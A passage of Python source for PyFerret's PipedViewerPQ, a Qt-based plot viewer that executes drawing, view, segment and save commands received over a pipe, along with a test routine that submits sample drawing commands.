self.__helper.computeARGB32PreMultInt(self.__lastclearcolor)\n else:\n fillint = 0\n image.fill(fillint)\n # paint the scene to this QImage\n painter = QPainter(image)\n # Scaling printfactor for the scene to the saved image\n widthscalefactor = imagewidth / float(self.__scenewidth)\n # Check if there are annotations to add\n if annopicture:\n # Scale the scene now for the annotations\n painter.scale(widthscalefactor, widthscalefactor)\n # Draw a solid white rectangle with black outline for the annotations\n painter.setBrush(QBrush(Qt.white, Qt.SolidPattern))\n painter.setPen(QPen(QBrush(Qt.black, Qt.SolidPattern),\n 2.0, Qt.SolidLine, Qt.SquareCap, Qt.BevelJoin))\n painter.drawRect(QRectF(1.0, 1.0,\n self.__scenewidth - 2.0,\n annosize.height() + 2.0 * self.__addedannomargin - 2.0))\n # And add the annotations within this box\n painter.drawPicture(QPointF(self.__addedannomargin,self.__addedannomargin),\n annopicture)\n # Draw the scene to the printer - scaling already in effect\n self.paintScene(painter, 0,\n 0.0, annosize.height() + 2.0 * self.__addedannomargin,\n 1.0, \"Saving\", False)\n else:\n # No annotations so just do the normal drawing\n self.paintScene(painter, 0, 0.0, 0.0,\n widthscalefactor, \"Saving\", False)\n if (self.__wmarkFilename is not None):\n # Initialize watermark objects\n wmkpic = QPixmap(self.__wmarkFilename)\n wmkpt = QPointF()\n wmkpt.setX(self.__xloc)\n wmkpt.setY(self.__yloc)\n # set watermark image display opacity\n painter.setOpacity(self.__opacity)\n # set image scale\n painter.scale(self.__scalefrac, self.__scalefrac)\n # paint watermark image at specified location\n painter.setRenderHint(QPainter.Antialiasing)\n painter.drawPixmap(wmkpt, wmkpic)\n painter.end()\n # save the image to file\n if not image.save(myfilename, myformat):\n raise ValueError(\"Unable to save the plot as \" + myfilename)\n\n def checkCommandPipe(self):\n '''\n Get and perform commands waiting in the pipe.\n Stop when no more commands or if more than 50\n milliseconds have passed.\n '''\n try:\n if (sys.version_info[0] >= 3) and (sys.version_info[1] >= 3):\n starttime = time.process_time()\n else:\n starttime = time.clock()\n # Wait up to 2 milliseconds waiting for a command.\n # This prevents unchecked spinning when there is\n # nothing to do (Qt immediately calling this method\n # again only for this method to immediately return).\n while self.__cmndpipe.poll(0.002):\n cmnd = self.__cmndpipe.recv()\n self.processCommand(cmnd)\n # Continue to try to process commands until\n # more than 50 milliseconds have passed.\n # This reduces Qt overhead when there are lots\n # of commands waiting in the queue.\n if (sys.version_info[0] >= 3) and (sys.version_info[1] >= 3):\n elapsed = time.process_time() - starttime\n else:\n elapsed = time.clock() - starttime\n if elapsed > 0.050:\n break\n except EOFError:\n # Assume PyFerret has shut down\n self.exitViewer()\n except Exception:\n # Some problem, but presumably still functional\n (exctype, excval) = sys.exc_info()[:2]\n try:\n if excval:\n self.__rspdpipe.send(\"**ERROR %s: %s\" % (str(exctype), str(excval)))\n else:\n self.__rspdpipe.send(\"**ERROR %s\" % str(exctype))\n except Exception:\n pass\n\n def processCommand(self, cmnd):\n '''\n Examine the action of cmnd and call the appropriate\n method to deal with this command. Raises a ValueError\n if the \"action\" key is missing.\n '''\n try:\n cmndact = cmnd[\"action\"]\n except KeyError:\n raise ValueError(\"Unknown command '%s'\" % str(cmnd))\n\n if cmndact == \"clear\":\n try:\n bkgcolor = self.__helper.getColorFromCmnd(cmnd)\n except KeyError:\n bkgcolor = None\n self.clearScene(bkgcolor)\n elif cmndact == \"exit\":\n self.exitViewer()\n elif cmndact == \"hide\":\n self.showMinimized()\n elif cmndact == \"screenInfo\":\n scrnrect = QApplication.desktop().availableGeometry()\n info = ( self.physicalDpiX(), self.physicalDpiY(),\n scrnrect.width(), scrnrect.height() )\n self.__rspdpipe.send(info)\n elif cmndact == \"antialias\":\n self.__antialias = bool(cmnd.get(\"antialias\", True))\n elif cmndact == \"update\":\n self.updateScene()\n elif cmndact == \"redraw\":\n try:\n bkgcolor = self.__helper.getColorFromCmnd(cmnd)\n except KeyError:\n bkgcolor = None\n self.redrawScene(bkgcolor)\n elif cmndact == \"rescale\":\n newscale = float(cmnd[\"factor\"])\n self.scaleScene(newscale, True)\n elif cmndact == \"resize\":\n mysize = self.__helper.getSizeFromCmnd(cmnd)\n self.resizeScene(mysize.width(), mysize.height())\n elif cmndact == \"save\":\n filename = cmnd[\"filename\"]\n fileformat = cmnd.get(\"fileformat\", None)\n transparent = cmnd.get(\"transparent\", False)\n vectsize = self.__helper.getSizeFromCmnd(cmnd[\"vectsize\"])\n rastsize = self.__helper.getSizeFromCmnd(cmnd[\"rastsize\"])\n try:\n myannotations = cmnd[\"annotations\"]\n except KeyError:\n myannotations = None\n self.saveSceneToFile(filename, fileformat, transparent,\n vectsize, rastsize, myannotations)\n elif cmndact == \"setWidthFactor\":\n newfactor = float(cmnd.get(\"factor\", -1.0))\n if newfactor <= 0.0:\n raise ValueError(\"Invalid width factor\")\n self.setWidthScalingFactor(newfactor)\n elif cmndact == \"setTitle\":\n self.setWindowTitle(cmnd[\"title\"])\n elif cmndact == \"imgname\":\n value = cmnd.get(\"name\", None)\n if value:\n self.__lastfilename = value\n value = cmnd.get(\"format\", None)\n if value:\n self.__lastformat = value.lower()\n elif cmndact == \"show\":\n if not self.isVisible():\n self.show()\n elif cmndact == \"noalpha\":\n self.__noalpha = True\n elif cmndact == \"beginView\":\n self.beginView(cmnd)\n elif cmndact == \"clipView\":\n self.clipView(cmnd)\n elif cmndact == \"endView\":\n self.endView(True)\n elif cmndact == \"beginSegment\":\n self.beginSegment(cmnd[\"segid\"])\n elif cmndact == \"endSegment\":\n self.endSegment(True)\n elif cmndact == \"deleteSegment\":\n self.deleteSegment(cmnd[\"segid\"])\n elif cmndact == \"createSymbol\":\n # Define this symbol in self.__symbolpaths\n sympath = self.__helper.getSymbolFromCmnd(cmnd)\n # The name is now all that is needed to use this symbol\n self.__rspdpipe.send(cmnd['name'])\n elif cmndact == \"drawMultiline\":\n self.drawMultiline(cmnd)\n elif cmndact == \"drawPoints\":\n self.drawPoints(cmnd)\n elif cmndact == \"drawPolygon\":\n self.drawPolygon(cmnd)\n elif cmndact == \"drawRectangle\":\n self.drawRectangle(cmnd)\n elif cmndact == \"textSize\":\n info = self.getSimpleTextSize(cmnd)\n self.__rspdpipe.send(info)\n elif cmndact == \"drawText\":\n self.drawSimpleText(cmnd)\n elif cmndact == \"setWaterMark\":\n # self.setWaterMark(cmnd)\n self.setWaterMark(cmnd['filename'], None, cmnd['xloc'], cmnd['yloc'], cmnd['scalefrac'], cmnd['opacity'])\n else:\n raise ValueError(\"Unknown command action %s\" % str(cmndact))\n\n def beginView(self, cmnd):\n '''\n Setup a new viewport and window for drawing on a portion\n (possibly all) of the scene. Recognized keys from cmnd\n are:\n \"viewfracs\": a dictionary of sides positions (see\n CmndHelperPQ.getSidesFromCmnd) giving the\n fractions [0.0, 1.0] of the way through the\n scene for the sides of the new View.\n \"clip\": clip to the new View? (default: True)\n\n Note that the view fraction values are based on (0,0) being the\n top left corner and (1,1) being the bottom right corner. Thus,\n left < right and top < bottom.\n\n Raises a KeyError if the \"viewfracs\" key is not given.\n '''\n # Get the view rectangle in fractions of the full scene\n fracsides = self.__helper.getSidesFromCmnd(cmnd[\"viewfracs\"])\n # Should graphics be clipped to this view?\n try:\n clipit = cmnd[\"clip\"]\n except KeyError:\n clipit = True\n self.beginViewFromSides(fracsides, clipit)\n\n def beginViewFromSides(self, fracsides, clipit):\n '''\n Setup a new viewport and window for drawing on a portion\n (possibly all) of the scene. The view in fractions of\n the full scene are given in fracsides. Sets the clipping\n rectangle to this view. If clipit is True, graphics\n will be clipped to this view.\n '''\n # If a view is still active, automatically end it\n if self.__activepainter:\n self.endView(True)\n # Get the location for the new view in terms of scene pixels.\n width = float(self.__scenewidth)\n height = float(self.__sceneheight)\n leftpixel = fracsides.left() * width\n rightpixel = fracsides.right() * width\n bottompixel = fracsides.bottom() * height\n toppixel = fracsides.top() * height\n # perform the checks after turning into units of pixels\n # to make sure the values are significantly different\n if (0.0 > leftpixel) or (leftpixel >= rightpixel) or (rightpixel > width):\n raise ValueError(\"Invalid left, right view fractions: \" \\\n \"left in pixels = %s, right in pixels = %s\" \\\n % (str(leftpixel), str(rightpixel)) )\n if (0.0 > toppixel) or (toppixel >= bottompixel) or (bottompixel > height):\n raise ValueError(\"Invalid bottom, top view fractions: \" \\\n \"top in pixels = %s, bottom in pixels = %s\" \\\n % (str(toppixel), str(bottompixel)) )\n # Create the view rectangle in device coordinates\n vrectf = QRectF(leftpixel, toppixel,\n rightpixel - leftpixel, bottompixel - toppixel)\n # Create the new picture and painter\n self.__activepicture = QPicture()\n self.__activepainter = QPainter(self.__activepicture)\n # Set the clip rectangle to that of the view; this also activates clipping\n self.__activepainter.setClipRect(vrectf, Qt.ReplaceClip)\n # Disable clipping if not desired at this time\n if not clipit:\n self.__activepainter.setClipping(False)\n # Note that __activepainter has to end before __activepicture will\n # draw anything. So no need to add it to __viewpics until then.\n self.__drawcount = 0\n # Save the current view sides and clipit setting for recreating the view.\n # Just save the original objects (assume calling functions do not keep them)\n self.__fracsides = fracsides\n self.__clipit = clipit\n\n def clipView(self, cmnd):\n '''\n If cmnd[\"clip\"] is True, activates clipping to the\n current view rectangle. If cmnd[\"clip\"] is False,\n disable clipping in this view.\n\n Raises a KeyError if the \"clip\" key is not given.\n '''\n if cmnd[\"clip\"]:\n self.__activepainter.setClipping(True)\n self.__clipit = True\n else:\n self.__activepainter.setClipping(False)\n self.__clipit = False\n\n def endView(self, update):\n '''\n Ends the current view and appends it to the list of pictures\n drawn in the scene. If update is True, the displayed scene\n is updated.\n '''\n self.__activepainter.end()\n self.__activepainter = None\n # Only save the active picture if it contains something\n if self.__drawcount > 0:\n self.__viewpics.append((self.__activepicture, self.__segid))\n self.__drawcount = 0\n if update:\n # update the scene\n self.drawLastPictures(False)\n self.__activepicture = None\n\n def beginSegment(self, segid):\n '''\n Associates a segment ID with the current empty view\n (picture) and all future views until endSegment is\n called. If the current view is not empty, the current\n view is ended and a new view started. If there is not\n a active view, the segment ID is just saved for the\n next active view.\n '''\n if self.__activepainter and (self.__drawcount > 0):\n self.endView(True)\n self.beginViewFromSides(self.__fracsides, self.__clipit)\n self.__segid = segid\n\n def endSegment(self, update):\n '''\n Ends the current active view and starts a new view.\n Removes the current segment ID associated with views.\n '''\n if self.__activepainter and (self.__drawcount > 0):\n self.endView(update)\n self.beginViewFromSides(self.__fracsides, self.__clipit)\n if update:\n self.drawLastPictures(False)\n self.__segid = None\n\n def deleteSegment(self, segid):\n '''\n Removes all pictures associated with the given segment ID\n '''\n # if deleting the current segment, end the current segment\n if segid == self.__segid:\n self.endSegment(False)\n # Go through all the pictures, determining which to save\n newpicts = [ ]\n for (viewpic, vsegid) in self.__viewpics:\n if vsegid != segid:\n newpicts.append((viewpic, vsegid))\n else:\n # picture was deleted, so will need to\n # regenerate the scene from the beginning\n self.__clearpixmap = True\n self.__lastpicdrawn = 0\n self.__viewpics[:] = newpicts\n # Do NOT update since there may be more segments to be deleted\n # Rely on the receiving an update or redraw command at the end\n\n def updateScene(self):\n '''\n Updates the displayed graphics to include all drawn elements.\n '''\n # If there is an active picture containing something,\n # end the view, thus adding and display this picture,\n # then restart the view.\n if self.__drawcount > 0:\n self.endView(True)\n self.beginViewFromSides(self.__fracsides, self.__clipit)\n self.drawLastPictures(False)\n\n def drawMultiline(self, cmnd):\n '''\n Draws a collection of connected line segments.\n\n Recognized keys from cmnd:\n \"points\": consecutive endpoints of the connected line\n segments as a list of (x, y) coordinates\n \"pen\": dictionary describing the pen used to draw the\n segments (see CmndHelperPQ.getPenFromCmnd)\n\n The coordinates are device coordinates from the upper left corner.\n\n Raises:\n KeyError if the \"points\" or \"pen\" key is not given\n ValueError if there are fewer than two endpoints given\n '''\n ptcoords = cmnd[\"points\"]\n if len(ptcoords) < 2:\n raise ValueError(\"fewer that two endpoints given\")\n endpts = QPolygonF( [ QPointF(xypair[0], xypair[1]) \\\n for xypair in ptcoords ] )\n mypen = self.__helper.getPenFromCmnd(cmnd[\"pen\"])\n self.__activepainter.setRenderHint(QPainter.Antialiasing,\n self.__antialias)\n self.__activepainter.setBrush(Qt.NoBrush)\n self.__activepainter.setPen(mypen)\n self.__activepainter.drawPolyline(endpts)\n self.__drawcount += 1\n # Limit the number of drawing commands per picture\n if self.__drawcount >= self.__maxdraws:\n self.updateScene()\n\n def drawPoints(self, cmnd):\n '''\n Draws a collection of discrete points using a single symbol\n for each point.\n\n Recognized keys from cmnd:\n \"points\": point centers as a list of (x,y) coordinates\n \"symbol\": symbol to use (see CmndHelperPQ.getSymbolFromCmnd)\n \"size\": size of the symbol in points (1/72 inches) before\n scaling by the width scaling factor\n \"color\": color name or 24-bit RGB integer value (eg, 0xFF0088)\n \"alpha\": alpha value from 0 (transparent) to 255 (opaque)\n \"highlight\": dictionary of \"color\" and \"alpha\" (as above)\n for filled symbol outline color; not outlined if omitted\n\n The coordinates are device coordinates from the upper left corner.\n\n Raises a KeyError if the \"symbol\", \"points\", or \"size\" key\n is not given.\n '''\n ptcoords = cmnd[\"points\"]\n ptsize = cmnd[\"size\"]\n try:\n highlight = self.__helper.getColorFromCmnd(cmnd[\"highlight\"])\n except KeyError:\n highlight = None\n sympath = self.__helper.getSymbolFromCmnd(cmnd[\"symbol\"])\n self.__activepainter.setRenderHint(QPainter.Antialiasing,\n self.__antialias)\n try:\n mycolor = self.__helper.getColorFromCmnd(cmnd)\n mybrush = QBrush(mycolor, Qt.SolidPattern)\n except KeyError:\n mybrush = QBrush(Qt.SolidPattern)\n if sympath.isFilled():\n self.__activepainter.setBrush(mybrush)\n if highlight:\n # highlighted filled plot - pen width is 4% of the width of the symbol\n mybrush = QBrush(highlight, Qt.SolidPattern)\n mypen = QPen(mybrush, 4.0, Qt.SolidLine, Qt.FlatCap, Qt.MiterJoin)\n self.__activepainter.setPen(mypen)\n else:\n # filled plot without highlight - no pen, only brush\n self.__activepainter.setPen(Qt.NoPen)\n else:\n # stroked path - no brush, pen width is 8% of the width of the symbol, highlight is ignored\n self.__activepainter.setBrush(Qt.NoBrush)\n mypen = QPen(mybrush, 8.0, Qt.SolidLine, Qt.FlatCap, Qt.MiterJoin)\n self.__activepainter.setPen(mypen)\n # typical symbols are 100x100 pixels\n scalefactor = ptsize * self.widthScalingFactor() / 100.0\n if self.__maxsymbolwidth < 100.0 * scalefactor:\n self.__maxsymbolwidth = 100.0 * scalefactor\n if self.__maxsymbolheight < 100.0 * scalefactor:\n self.__maxsymbolheight = 100.0 * scalefactor\n for xyval in ptcoords:\n # save so the translation and scale are not permanent\n self.__activepainter.save()\n try:\n self.__activepainter.translate( QPointF(xyval[0], xyval[1]) )\n self.__activepainter.scale(scalefactor, scalefactor)\n self.__activepainter.drawPath(sympath.painterPath())\n finally:\n self.__activepainter.restore()\n self.__drawcount += len(ptcoords)\n # Limit the number of drawing commands per picture\n if self.__drawcount >= self.__maxdraws:\n self.updateScene()\n\n def drawPolygon(self, cmnd):\n '''\n Draws a polygon item to the viewer.\n\n Recognized keys from cmnd:\n \"points\": the vertices of the polygon as a list of (x,y)\n coordinates\n \"fill\": dictionary describing the brush used to fill the\n polygon; see CmndHelperPQ.getBrushFromCmnd\n If not given, the polygon will not be filled.\n \"outline\": dictionary describing the pen used to outline\n the polygon; see CmndHelperPQ.getPenFromCmnd\n If not given, the border will be drawn with a\n cosmetic pen identical to the brush used to fill\n the polygon.\n\n The coordinates are device coordinates from the upper left corner.\n\n Raises a KeyError if the \"points\" key is not given.\n '''\n mypoints = cmnd[\"points\"]\n mypolygon = QPolygonF( [ QPointF(xypair[0], xypair[1]) \\\n for xypair in mypoints ] )\n self.__activepainter.setRenderHint(QPainter.Antialiasing,\n False)\n try:\n mybrush = self.__helper.getBrushFromCmnd(cmnd[\"fill\"])\n except KeyError:\n mybrush = Qt.NoBrush\n try:\n mypen = self.__helper.getPenFromCmnd(cmnd[\"outline\"])\n except KeyError:\n if ( mybrush == Qt.NoBrush ):\n raise ValueError('drawPolygon called without a Brush or Pen')\n # Use a \"cosmetic\" Pen matching the brush\n # mypen = QPen(mybrush, 0.0, Qt.SolidLine, Qt.SquareCap, Qt.BevelJoin)\n mypen = Qt.NoPen\n self.__activepainter.setBrush(mybrush)\n self.__activepainter.setPen(mypen)\n self.__activepainter.drawPolygon(mypolygon)\n self.__drawcount += 1\n # Limit the number of drawing commands per picture\n if self.__drawcount >= self.__maxdraws:\n self.updateScene()\n\n def drawRectangle(self, cmnd):\n '''\n Draws a rectangle in the current view using the information\n in the dictionary cmnd.\n\n Recognized keys from cmnd:\n \"left\": x-coordinate of left edge of the rectangle\n \"bottom\": y-coordinate of the bottom edge of the rectangle\n \"right\": x-coordinate of the right edge of the rectangle\n \"top\": y-coordinate of the top edge of the rectangle\n \"fill\": dictionary describing the brush used to fill the\n rectangle; see CmndHelperPQ.getBrushFromCmnd\n If not given, the rectangle will not be filled.\n \"outline\": dictionary describing the pen used to outline\n the rectangle; see CmndHelperPQ.getPenFromCmnd\n If not given, the border will be drawn with a\n cosmetic pen identical to the brush used to fill\n the rectangle.\n\n The coordinates are device coordinates from the upper left corner.\n\n Raises a ValueError if the width or height of the rectangle\n is not positive.\n '''\n # get the left, bottom, right, and top values\n # any keys not given get a zero value\n sides = self.__helper.getSidesFromCmnd(cmnd)\n width = sides.right() - sides.left()\n if width <= 0.0:\n raise ValueError(\"width of the rectangle (%s) in not positive\" % str(width))\n height = sides.bottom() - sides.top()\n if height <= 0.0:\n raise ValueError(\"height of the rectangle (%s) in not positive\" % str(height))\n myrect = QRectF(sides.left(), sides.top(), width, height)\n self.__activepainter.setRenderHint(QPainter.Antialiasing,\n False)\n try:\n mybrush = self.__helper.getBrushFromCmnd(cmnd[\"fill\"])\n except KeyError:\n mybrush = Qt.NoBrush\n try:\n mypen = self.__helper.getPenFromCmnd(cmnd[\"outline\"])\n except KeyError:\n if ( mybrush == Qt.NoBrush ):\n raise ValueError('drawPolygon called without a Brush or Pen')\n # Use a \"cosmetic\" Pen matching the brush\n # mypen = QPen(mybrush, 1.0, Qt.SolidLine, Qt.SquareCap, Qt.BevelJoin)\n mypen = Qt.NoPen\n self.__activepainter.setBrush(mybrush)\n self.__activepainter.setPen(mypen)\n self.__activepainter.drawRect(myrect)\n self.__drawcount += 1\n # Limit the number of drawing commands per picture\n if self.__drawcount >= self.__maxdraws:\n self.updateScene()\n\n def getSimpleTextSize(self, cmnd):\n '''\n Returns the pair (width, height) for given text when drawn.\n Raises a KeyError if the \"text\" key is not given.\n\n The width value is the width for the text that can be used\n for positioning the next text item to draw. The height\n value is the ascent plus decent for the font and does not\n depend of the text. The bounding rectangle for the actual\n drawn text may exceed this (width, height) if,\n e.g., italic or unusual characters.\n\n Recognized keys from cmnd:\n \"text\": string to displayed\n \"font\": dictionary describing the font to use; see\n CmndHelperPQ.getFontFromCmnd. If not given\n the default font for this viewer is used.\n '''\n try:\n myfont = self.__helper.getFontFromCmnd(cmnd[\"font\"])\n except KeyError:\n myfont = self.__activepainter.font()\n myfontmetrics = QFontMetricsF(myfont)\n mytext = cmnd[\"text\"]\n if PYTHONQT_VERSION == 'PyQt4':\n mytext = QString.fromUtf8(mytext)\n width = myfontmetrics.width(mytext)\n height = myfontmetrics.height()\n return (width, height)\n\n def drawSimpleText(self, cmnd):\n '''\n Draws a \"simple\" text item in the current view.\n Raises a KeyError if the \"text\" or \"location\" key is not given.\n\n Recognized keys from cmnd:\n \"text\": null-terminated UTF-8 encoded string to be displayed\n \"font\": dictionary describing the font to use; see\n CmndHelperPQ.getFontFromCmnd. If not given\n the default font for this viewer is used.\n \"fill\": dictionary describing the pen used to draw the\n text; see CmndHelperPQ.getPenFromCmnd.\n If not given, the default pen for this viewer\n is used.\n \"rotate\": clockwise rotation of the text in degrees\n \"location\": (x,y) location for the baseline of the\n start of text. The coordinates are device\n coordinates from the upper left corner.\n '''\n mytext = cmnd[\"text\"]\n startpt = cmnd[\"location\"]\n self.__activepainter.setRenderHint(QPainter.Antialiasing,\n self.__antialias)\n self.__activepainter.setBrush(Qt.NoBrush)\n try:\n mypen = self.__helper.getPenFromCmnd(cmnd[\"fill\"])\n self.__activepainter.setPen(mypen)\n except KeyError:\n pass\n # save so the font, translation, and rotation are not permanent\n self.__activepainter.save()\n try:\n try:\n myfont = self.__helper.getFontFromCmnd(cmnd[\"font\"])\n self.__activepainter.setFont(myfont)\n except KeyError:\n pass\n # Move the coordinate system so the origin is at the start\n # of the text so that rotation is about this point\n self.__activepainter.translate(startpt[0], startpt[1])\n try:\n rotdeg = cmnd[\"rotate\"]\n self.__activepainter.rotate(rotdeg)\n except KeyError:\n pass\n\n if PYTHONQT_VERSION == 'PyQt4':\n mytext = QString.fromUtf8(mytext)\n self.__activepainter.drawText(0, 0, mytext)\n self.__drawcount += 1\n finally:\n # return the painter to the default state\n self.__activepainter.restore()\n # Limit the number of drawing commands per picture\n if self.__drawcount >= self.__maxdraws:\n self.updateScene()\n\n def setWidthScalingFactor(self, factor):\n '''\n Assign the scaling factor for line widths and symbol sizes\n to convert from points (1/72 inches) to pixels, and to apply\n any additional width scaling specified by factor.\n '''\n self.__widthfactor = (self.physicalDpiX() + self.physicalDpiY()) / 144.0\n self.__widthfactor *= factor\n\n def widthScalingFactor(self):\n '''\n Return the scaling factor for line widths and symbol sizes\n to convert from points (1/72 inches) to pixels, and to apply\n any additional width scaling specified by setWidthFactor.\n '''\n return self.__widthfactor\n\n def setWaterMark(self, filename, len_filename, xloc, yloc, scalefrac, opacity):\n '''\n Overlay watermark from contents of filename.\n\n Recognized keys from cmnd:\n \"filename\": water mark image file\n \"xloc\": horizontal position of upper left corner of watermark image\n \"yloc\": vertical position of upper left corner of watermark image\n \"scalefrac\": multiple of original image size to display plot as\n \"opacity\": image visibility in range [0.0, 1.0] where 0->invisible, 1->opaque\n '''\n self.__wmarkFilename = str(filename)\n self.__xloc = xloc\n self.__yloc = yloc\n self.__scalefrac = scalefrac\n self.__opacity = opacity\n\nclass PipedViewerPQProcess(Process):\n '''\n A Process specifically tailored for creating a PipedViewerPQ.\n '''\n def __init__(self, cmndpipe, rspdpipe):\n '''\n Create a Process that will produce a PipedViewerPQ\n attached to the given Pipes when run.\n '''\n super(PipedViewerPQProcess,self).__init__(group=None, target=None, name='PipedViewerPQ')\n self.__cmndpipe = cmndpipe\n self.__rspdpipe = rspdpipe\n self.__app = None\n self.__viewer = None\n\n def run(self):\n '''\n Create a PipedViewerPQ that is attached\n to the Pipe of this instance.\n '''\n self.__app = QApplication([\"PipedViewerPQ\"])\n self.__viewer = PipedViewerPQ(self.__cmndpipe, self.__rspdpipe)\n myresult = self.__app.exec_()\n sys.exit(myresult)\n\n\n#\n# The following are for testing this (and the cmndhelperpq) modules\n#\n\nclass _CommandSubmitterPQ(QDialog):\n '''\n Testing dialog for controlling the addition of commands to a pipe.\n Used for testing PipedViewerPQ in the same process as the viewer.\n '''\n def __init__(self, parent, cmndpipe, rspdpipe, cmndlist):\n '''\n Create a QDialog with a single QPushButton for controlling\n the submission of commands from cmndlist to cmndpipe.\n '''\n super(_CommandSubmitterPQ,self).__init__(parent)\n self.__cmndlist = cmndlist\n self.__cmndpipe = cmndpipe\n self.__rspdpipe = rspdpipe\n self.__nextcmnd = 0\n self.__button = QPushButton(\"Submit next command\", self)\n self.__button.pressed.connect(self.submitNextCommand)\n self.show()\n\n def submitNextCommand(self):\n '''\n Submit the next command from the command list to the command pipe,\n or shutdown if there are no more commands to submit.\n '''\n try:\n print(\"Command: %s\" % str(self.__cmndlist[self.__nextcmnd]))\n self.__cmndpipe.send(self.__cmndlist[self.__nextcmnd])\n self.__nextcmnd += 1\n while self.__rspdpipe.poll(0.1):\n print(\"Response: %s\" % str(self.__rspdpipe.recv()))\n except IndexError:\n self.__rspdpipe.close()\n self.__cmndpipe.close()\n self.close()\n\n\ndef _test_pipedviewerpq():\n # vertices of a pentagon (roughly) centered in a 1000 x 1000 square\n pentagonpts = ( (504.5, 100.0), (100.0, 393.9),\n (254.5, 869.4), (754.5, 869.4),\n (909.0, 393.9), )\n\n # create the list of commands to submit\n drawcmnds = []\n drawcmnds.append( { \"action\":\"setTitle\", \"title\":\"Tester\" } )\n drawcmnds.append( { \"action\":\"show\" } )\n drawcmnds.append( { \"action\":\"clear\", \"color\":\"black\"} )\n drawcmnds.append( { \"action\":\"screenInfo\"} )\n drawcmnds.append( { \"action\":\"antialias\", \"antialias\":True } )\n drawcmnds.append( { \"action\":\"resize\",\n \"width\":500,\n \"height\":500 } )\n drawcmnds.append( { \"action\":\"beginView\",\n \"viewfracs\":{\"left\":0.0, \"right\":0.5,\n \"top\":0.5, \"bottom\":1.0},\n \"clip\":True } )\n drawcmnds.append( { \"action\":\"drawRectangle\",\n \"left\": 5, \"right\":245,\n \"top\":245, \"bottom\":495,\n \"fill\":{\"color\":\"green\", \"alpha\":128} } )\n mypentapts = [ (.25 * ptx, .25 * pty + 250) for (ptx, pty) in pentagonpts ]\n drawcmnds.append( { \"action\":\"drawPolygon\",\n \"points\":mypentapts,\n \"fill\":{\"color\":\"blue\"},\n \"outline\":{\"color\":\"black\",\n \"width\": 5,\n \"style\":\"solid\",\n \"capstyle\":\"round\",\n \"joinstyle\":\"round\" } } )\n drawcmnds.append( { \"action\":\"beginSegment\",\n \"segid\":\"text\" } )\n drawcmnds.append( { \"action\":\"drawText\",\n \"text\":\"y=480\",\n \"font\":{\"family\":\"Times\", \"size\":16},\n \"fill\":{\"color\":\"red\"},\n \"location\":(50,480) } )\n drawcmnds.append( { \"action\":\"drawText\",\n \"text\":\"y=430\",\n \"font\":{\"family\":\"Times\", \"size\":16},\n \"fill\":{\"color\":\"red\"},\n \"location\":(50,430) } )\n drawcmnds.append( { \"action\":\"drawText\",\n \"text\":\"y=380\",\n \"font\":{\"family\":\"Times\", \"size\":16},\n \"fill\":{\"color\":\"red\"},\n \"location\":(50,380) } )\n drawcmnds.append( { \"action\":\"drawText\",\n \"text\":\"y=330\",\n \"font\":{\"family\":\"Times\", \"size\":16},\n \"fill\":{\"color\":\"red\"},\n \"location\":(50,330) } )\n drawcmnds.append( { \"action\":\"textSize\",\n \"text\":\"This is a some line of text\",\n \"font\":{\"family\":\"Times\", \"size\":16} } )\n drawcmnds.append( { \"action\":\"endSegment\" } )\n drawcmnds.append( { \"action\":\"endView\" } )\n drawcmnds.append( { \"action\":\"show\" } )\n drawcmnds.append( { \"action\":\"createSymbol\",\n \"name\": \"uptrifill\",\n \"pts\": ( (-40.0, -30.0), (0.0, 40.0), (40.0, -30.0), (-40.0, -30.0), ),\n \"fill\": True } )\n drawcmnds.append( { \"action\":\"createSymbol\",\n \"name\": \"bararrow\",\n \"pts\": ( (-50,50), (-10,10),\n (-999, -999),\n (50,0), (50,50), (0,50),\n (-999, -999),\n (0,-10), (20,-30), (10,-30), (10,-50), (-10,-50), (-10,-30), (-20,-30), (0,-10), ),\n \"fill\": False } )\n drawcmnds.append( { \"action\":\"beginView\",\n \"viewfracs\":{\"left\":0.0, \"right\":1.0,\n \"top\":0.0, \"bottom\":1.0},\n \"clip\":True } )\n drawcmnds.append( { \"action\":\"drawPoints\",\n \"points\":( (100, 50),\n (100, 150),\n (100, 250),\n (100, 350),\n (100, 450) ),\n \"symbol\":\"dot\",\n \"size\":20,\n \"color\":\"magenta\" })\n drawcmnds.append( { \"action\":\"drawPoints\",\n \"points\":( (150, 50),\n (150, 150),\n (150, 250),\n (150, 350),\n (150, 450) ),\n \"symbol\":\"circle\",\n \"size\":20,\n \"color\":\"magenta\" })\n drawcmnds.append( { \"action\":\"drawPoints\",\n \"points\":( (200, 50),\n (200, 150),\n (200, 250),\n (200, 350),\n (200, 450) ),\n \"symbol\":\"dotplus\",\n \"size\":20,\n \"color\":\"magenta\" })\n drawcmnds.append( { \"action\":\"drawPoints\",\n \"points\":( (250, 50),\n (250, 150),\n (250, 250),\n (250, 350),\n (250, 450) ),\n \"symbol\":\"circplus\",\n \"size\":20,\n \"color\":\"magenta\" })\n drawcmnds.append( { \"action\":\"drawPoints\",\n \"points\":( (300, 50),\n (300, 150),\n (300, 250),\n (300, 350),\n (300, 450) ),\n \"symbol\":\"dotex\",\n \"size\":20,\n \"color\":\"magenta\" })\n drawcmnds.append( { \"action\":\"drawPoints\",\n \"points\":( (350, 50),\n (350, 150),\n (350, 250),\n (350, 350),\n (350, 450) ),\n \"symbol\":\"circex\",\n \"size\":20,\n \"color\":\"magenta\" })\n drawcmnds.append( { \"action\":\"drawPoints\",\n \"points\":( (400, 50),\n (400, 150),\n (400, 250),\n (400, 350),\n (400, 450) ),\n \"symbol\":\"uptrifill\",\n \"size\":20,\n \"color\":\"magenta\" })\n drawcmnds.append( { \"action\":\"drawPoints\",\n \"points\":( (450, 50),\n (450, 150),\n (450, 250),\n (450, 350),\n (450, 450) ),\n \"symbol\":\"bararrow\",\n \"size\":20,\n \"color\":\"magenta\" })\n drawcmnds.append( { \"action\":\"drawMultiline\",\n \"points\":( (350, 50),\n (200, 150),\n (400, 250),\n (300, 350),\n (150, 250),\n (100, 450) ),\n \"pen\": {\"color\":\"white\",\n \"width\":3,\n \"style\":\"dash\",\n \"capstyle\":\"round\",\n \"joinstyle\":\"round\"} } )\n drawcmnds.append( { \"action\":\"endView\" } )\n drawcmnds.append( { \"action\":\"show\" } )\n drawcmnds.append( { \"action\":\"deleteSegment\",\n \"segid\":\"text\" } )\n drawcmnds.append( { \"action\":\"update\" } )\n drawcmnds.append( { \"action\":\"show\" } )\n annotations = ( \"The 1st CO2 annotations line\",\n \"Another line with lengthy details that go on and on \" + \\\n \"and on and should wrap to a 2nd annotation line\",\n \"Final annotation line\" )\n drawcmnds.append( { \"action\":\"save\",\n \"filename\":\"test.pdf\",\n 